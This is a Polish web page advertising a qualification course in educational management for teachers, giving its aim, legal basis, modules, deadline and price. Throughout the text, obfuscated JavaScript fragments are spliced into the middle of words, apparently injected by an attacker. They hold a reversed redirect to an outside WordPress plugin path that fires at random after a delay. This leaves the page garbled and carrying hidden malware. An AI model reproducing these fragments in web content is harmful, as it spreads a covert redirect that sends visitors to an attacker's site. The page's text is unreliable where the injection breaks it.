Site Loader

Adresat

nauczyciele wszystkich typów szkół i placówek oświatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towych

Cel

przygotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie nauczycieli do pełnienia funkcji dyrektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tora szkoły/placówki

Program

Kurs kwalifikacyjny w zakresie zarządzania oświatą został opracowany na podstawie:

– Ramowego Planu i Programu  Kursu Kwalifikacyjnego  z  zakresu  Zarządzania Oświatą  zatwierdzonego przez MEN  dnia 10.11.2015 r. na podstawie § 18a ust. 4 pkt. 1 rozporządzenia MEN  z dnia 19 listoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topada w sprawie placówek doskonalenia nauczycieli ( Dz. U. z 2014, poz. 1041, z późniejszymi  zmianami ).

Kurs obejmuje  210 godzin

  • Przywództwo edukacyjne w szkole
  • Przywództwo dla uczenia sie i rozwoju indywidualnego
  • Polityka oświatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towa – dyrektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor jako lider w środowisku
  • Zarządzanie zespołami ludzkimi
  • Zarządzanie strategiczne w kontekście prawnym, społecznym i finansowym
  • Zarządzanie własnym rozwojem zawodowym
  • Zadania praktyczne  w wyżej wymienionymi obszarami tematycznymi

Nabór do dnia 30 października 2020 r.

Planowany termin rozpoczęcia kursu kwalifikacyjnego – listoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topad 2020 r.

KOSZT – 1300 ,-zł /os.